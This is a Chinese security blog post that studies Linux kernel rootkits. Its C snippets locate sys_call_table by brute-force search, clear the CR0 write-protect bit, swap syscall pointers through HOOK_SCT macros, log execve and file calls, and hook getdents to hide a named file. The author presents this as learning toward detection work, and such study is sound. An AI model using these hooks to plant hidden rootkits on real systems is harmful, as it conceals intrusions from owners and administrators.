<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.loli.net/css?family=Noto+Serif+SC:300,300italic,400,400italic,700,700italic|Lobster+Two:300,300italic,400,400italic,700,700italic|EB+Garamond:300,300italic,400,400italic,700,700italic|Roboto+Slab:300,300italic,400,400italic,700,700italic|Source+Code+Pro:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"driverxdw.github.io","root":"/","scheme":"Muse","version":"8.0.0-rc.5","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}};
  </script>

  <meta name="description" content="原理rootkit通常是指攻击者拿到root权限以后在行为这块做隐藏的恶意软件，其工作环境包括用户态和内核态，用户态的手法一般是通过ld_preload hook glibc，内核态则是写lkm去hook系统调用。hook系统调用技术其实也有细分，包括kernel inline hook、kprobe、sys_call_table hook等，这篇博客所记录的就是最基础的sys_call_tabl">
<meta property="og:type" content="article">
<meta property="og:title" content="rootkit sys_call_table hook learning">
<meta property="og:url" content="https://driverxdw.github.io/2020/08/09/rootkit-sys-call-table-hook-learning/index.html">
<meta property="og:site_name" content="in0va&#39;S Blog  JustLearnM0re">
<meta property="og:description" content="原理rootkit通常是指攻击者拿到root权限以后在行为这块做隐藏的恶意软件，其工作环境包括用户态和内核态，用户态的手法一般是通过ld_preload hook glibc，内核态则是写lkm去hook系统调用。hook系统调用技术其实也有细分，包括kernel inline hook、kprobe、sys_call_table hook等，这篇博客所记录的就是最基础的sys_call_tabl">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://driverxdw.github.io/2020/08/09/rootkit-sys-call-table-hook-learning/image-20200809235219297.png">
<meta property="og:image" content="https://driverxdw.github.io/2020/08/09/rootkit-sys-call-table-hook-learning/image-20200809235428113.png">
<meta property="og:image" content="https://driverxdw.github.io/2020/08/09/rootkit-sys-call-table-hook-learning/image-20200810001424387.png">
<meta property="article:published_time" content="2020-08-09T14:12:08.000Z">
<meta property="article:modified_time" content="2020-09-11T15:59:49.675Z">
<meta property="article:author" content="XDW">
<meta property="article:tag" content="二进制">
<meta property="article:tag" content="攻防">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://driverxdw.github.io/2020/08/09/rootkit-sys-call-table-hook-learning/image-20200809235219297.png">


<link rel="canonical" href="https://driverxdw.github.io/2020/08/09/rootkit-sys-call-table-hook-learning/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>rootkit sys_call_table hook learning | in0va'S Blog  JustLearnM0re</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">in0va'S Blog  JustLearnM0re</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">犯二</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">12</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">85</span></a>

  </li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
          <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#原理"><span class="nav-number">1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#研究过程"><span class="nav-number">2.</span> <span class="nav-text">研究过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sys-call-table-modify"><span class="nav-number">2.1.</span> <span class="nav-text">sys_call_table modify</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sys-call-hook"><span class="nav-number">2.2.</span> <span class="nav-text">sys_call hook</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考链接"><span class="nav-number">4.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="XDW"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">XDW</p>
  <div class="site-description" itemprop="description">一枚很菜但是仍在学习的二进制菜逼</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">85</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">51</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.ixuchao.cn/" title="https:&#x2F;&#x2F;blog.ixuchao.cn&#x2F;" rel="noopener" target="_blank">Archerx's Blog</a>
        </li>
    </ul>
  </div>

      </section>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://driverxdw.github.io/2020/08/09/rootkit-sys-call-table-hook-learning/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="XDW">
      <meta itemprop="description" content="一枚很菜但是仍在学习的二进制菜逼">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="in0va'S Blog  JustLearnM0re">
    </span>

    
    
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          rootkit sys_call_table hook learning
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-08-09 22:12:08" itemprop="dateCreated datePublished" datetime="2020-08-09T22:12:08+08:00">2020-08-09</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-09-11 23:59:49" itemprop="dateModified" datetime="2020-09-11T23:59:49+08:00">2020-09-11</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/HIDS/" itemprop="url" rel="index"><span itemprop="name">HIDS</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>rootkit通常是指攻击者拿到root权限以后在行为这块做隐藏的恶意软件，其工作环境包括用户态和内核态，用户态的手法一般是通过ld_preload hook glibc，内核态则是写lkm去hook系统调用。hook系统调用技术其实也有细分，包括kernel inline hook、kprobe、sys_call_table hook等，这篇博客所记录的就是最基础的sys_call_table hook这块的内容。</p>
<h2 id="研究过程"><a href="#研究过程" class="headerlink" title="研究过程"></a>研究过程</h2><h3 id="sys-call-table-modify"><a href="#sys-call-table-modify" class="headerlink" title="sys_call_table modify"></a>sys_call_table modify</h3><p><strong>sys_call_table地址获取</strong></p>
<p>sys_call_table地址获取方式有如下几种：</p>
<p>1、从/boot/System.map中获取</p>
<p>2、从/proc/kallsyms中获取</p>
<p>3、idt劫持</p>
<p>4、暴力搜索</p>
<a id="more"></a>



<p>这边选择的是第四种方式，利用未导出函数的地址及公开的系统调用索引，从内核空间起始地址开始搜索，最终得到syscall_table</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">long</span> **</span><br><span class="line">get_sct_via_sys_close(<span class="keyword">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> **entry = (<span class="keyword">unsigned</span> <span class="keyword">long</span> **)PAGE_OFFSET;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (;(<span class="keyword">unsigned</span> <span class="keyword">long</span>)entry &lt; ULONG_MAX; entry += <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (entry[__NR_close] == (<span class="keyword">unsigned</span> <span class="keyword">long</span> *)sys_close) &#123;</span><br><span class="line">            <span class="keyword">return</span> entry;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>写保护关闭</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span></span><br><span class="line">disable_wp(<span class="keyword">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> cr0;</span><br><span class="line"></span><br><span class="line">    preempt_disable();</span><br><span class="line">    cr0 = read_cr0();</span><br><span class="line">    clear_bit(X86_CR0_WP_BIT, &amp;cr0);</span><br><span class="line">    write_cr0(cr0);</span><br><span class="line">    preempt_enable();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>sys_call_table 修改</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_openat(<span class="keyword">int</span> dirfd,<span class="keyword">const</span> <span class="keyword">char</span> __user *filename, <span class="keyword">int</span> flags, <span class="keyword">umode_t</span> mode)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ((flags &amp; O_CREAT) &amp;&amp; <span class="built_in">strcmp</span>(filename, <span class="string">"/dev/null"</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">        fm_alert(<span class="string">"open: %s\n"</span>, filename);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_openat(dirfd,filename, flags, mode);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_unlink(<span class="keyword">const</span> <span class="keyword">char</span> __user *pathname)</span><br><span class="line">&#123;</span><br><span class="line">    fm_alert(<span class="string">"unlink: %s\n"</span>, pathname);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_unlink(pathname);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_unlinkat(<span class="keyword">int</span> dfd, <span class="keyword">const</span> <span class="keyword">char</span> __user * pathname, <span class="keyword">int</span> flag)</span><br><span class="line">&#123;</span><br><span class="line">    fm_alert(<span class="string">"unlinkat: %s\n"</span>, pathname);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_unlinkat(dfd, pathname, flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># <span class="meta-keyword">define</span> HOOK_SCT(sct, name)                    \</span></span><br><span class="line">    <span class="keyword">do</span> &#123;                                        \</span><br><span class="line">        real_#<span class="meta">#name = (void *)sct[__NR_##name]; \</span></span><br><span class="line">        sct[__NR_#<span class="meta">#name] = (void *)fake_##name; \</span></span><br><span class="line">    &#125; <span class="keyword">while</span> (<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<p><strong>恢复</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># <span class="meta-keyword">define</span> UNHOOK_SCT(sct, name)                  \</span></span><br><span class="line">    sct[__NR_#<span class="meta">#name] = (void *)real_##name</span></span><br></pre></td></tr></table></figure>



<h3 id="sys-call-hook"><a href="#sys-call-hook" class="headerlink" title="sys_call hook"></a>sys_call hook</h3><p><strong>process monitor</strong></p>
<p>监控进程执行，其实就是hook execve后对argv进行格式化输出cmdline</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_execve(<span class="keyword">const</span> <span class="keyword">char</span> __user *filename,</span><br><span class="line">            <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *argv,</span><br><span class="line">            <span class="keyword">const</span> <span class="keyword">char</span> __user *<span class="keyword">const</span> __user *envp)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">char</span> *args;</span><br><span class="line">    <span class="keyword">char</span> *buff = kmalloc(PAGE_SIZE, GFP_KERNEL);<span class="comment">//1024bytes</span></span><br><span class="line">    <span class="keyword">if</span> (buff) &#123;</span><br><span class="line">        args = join_strings(argv, <span class="string">" "</span>, buff, PAGE_SIZE);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        args = (<span class="keyword">char</span> *)argv[<span class="number">0</span>];</span><br><span class="line">        buff = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    printk(<span class="string">"execve: %s\n"</span>, args);</span><br><span class="line"></span><br><span class="line">    kfree(buff);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_execve(filename, argv, envp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="./image-20200809235219297.png" alt="image-20200809235219297"></p>
<p><strong>File monitor</strong></p>
<p>监控file（创建、删除），和execve hook类似，但ubuntu16.04 kernel 4.15.0-54 的环境中测试demo把内核hang死了，在ubuntu 18.04 kernel 4.15.0-29的环境中测试，strace发现其创建文件系统调用不是open而是openat，修改部分代码重新编译测试demo</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_openat(<span class="keyword">int</span> dirfd,<span class="keyword">const</span> <span class="keyword">char</span> __user *filename, <span class="keyword">int</span> flags, <span class="keyword">umode_t</span> mode)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ((flags &amp; O_CREAT) &amp;&amp; <span class="built_in">strcmp</span>(filename, <span class="string">"/dev/null"</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">        fm_alert(<span class="string">"open: %s\n"</span>, filename);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_openat(dirfd,filename, flags, mode);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_unlink(<span class="keyword">const</span> <span class="keyword">char</span> __user *pathname)</span><br><span class="line">&#123;</span><br><span class="line">    fm_alert(<span class="string">"unlink: %s\n"</span>, pathname);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_unlink(pathname);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_unlinkat(<span class="keyword">int</span> dfd, <span class="keyword">const</span> <span class="keyword">char</span> __user * pathname, <span class="keyword">int</span> flag)</span><br><span class="line">&#123;</span><br><span class="line">    fm_alert(<span class="string">"unlinkat: %s\n"</span>, pathname);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> real_unlinkat(dfd, pathname, flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="./image-20200809235428113.png" alt="image-20200809235428113"></p>
<p><strong>File hide</strong> </p>
<p>ls等程序通过getdents/getdents64获取当前目录下的文件条目，demo hook此系统调用并过滤指定文件名条目，过滤完后返回给下层系统调用并最终输出给用户</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_getdents(<span class="keyword">unsigned</span> <span class="keyword">int</span> fd,</span><br><span class="line">              struct linux_dirent __user *dirent,</span><br><span class="line">              <span class="keyword">unsigned</span> <span class="keyword">int</span> count)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">long</span> ret;</span><br><span class="line"></span><br><span class="line">    ret = real_getdents(fd, dirent, count);</span><br><span class="line"></span><br><span class="line">    print_dents(dirent, ret);</span><br><span class="line">    ret = remove_dent(SECRET_FILE, dirent, ret);</span><br><span class="line">    print_dents(dirent, ret);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// INFO: It was triggered on a Kali i686-pae installation.</span></span><br><span class="line">asmlinkage <span class="keyword">long</span></span><br><span class="line">fake_getdents64(<span class="keyword">unsigned</span> <span class="keyword">int</span> fd,</span><br><span class="line">                struct linux_dirent64 __user *dirent,</span><br><span class="line">                <span class="keyword">unsigned</span> <span class="keyword">int</span> count)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">long</span> ret;</span><br><span class="line"></span><br><span class="line">    ret = real_getdents64(fd, dirent, count);</span><br><span class="line"></span><br><span class="line">    print_dents64(dirent, ret);</span><br><span class="line">    ret = remove_dent64(SECRET_FILE, dirent, ret);</span><br><span class="line">    print_dents64(dirent, ret);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="./image-20200810001424387.png" alt="image-20200810001424387"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>代码非常简单，难的是在脑中构建一整套程序底层运行流程，需要将很多零碎的东西串联起来；下期抽空整理输出下常见rootkit lkm隐藏技术及rkhunter/chkrootkit源码分析，再之后rookit这块的研究更多将偏向检测等。</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://tnichols.org/2015/10/19/Hooking-the-Linux-System-Call-Table/" target="_blank" rel="noopener">https://tnichols.org/2015/10/19/Hooking-the-Linux-System-Call-Table/</a></p>
<p><a href="https://github.com/NoviceLive/research-rootkit" target="_blank" rel="noopener">https://github.com/NoviceLive/research-rootkit</a></p>
<p><a href="https://docs-conquer-the-universe.readthedocs.io/zh_CN/latest/linux_rootkit/sys_call_table.html" target="_blank" rel="noopener">https://docs-conquer-the-universe.readthedocs.io/zh_CN/latest/linux_rootkit/sys_call_table.html</a></p>
<p><a href="https://www.freebuf.com/articles/system/108392.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/108392.html</a></p>
<p><a href="https://kernelhacking.com/rodrigo/docs/StMichael/kernel-land-rootkits.pdf" target="_blank" rel="noopener">https://kernelhacking.com/rodrigo/docs/StMichael/kernel-land-rootkits.pdf</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E4%BA%8C%E8%BF%9B%E5%88%B6/" rel="tag"># 二进制</a>
              <a href="/tags/%E6%94%BB%E9%98%B2/" rel="tag"># 攻防</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/08/02/Libpcap%E6%80%A7%E8%83%BD%E9%97%AE%E9%A2%98%E6%80%BB%E7%BB%93/" rel="prev" title="Libpcap性能问题总结">
                  <i class="fa fa-chevron-left"></i> Libpcap性能问题总结
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/08/30/Netstat-Source-Code-Debug/" rel="next" title="Netstat Source Code Debug">
                  Netstat Source Code Debug <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
  
  
  



      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">XDW</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>



    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  















  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>








  

  

</body>
</html>
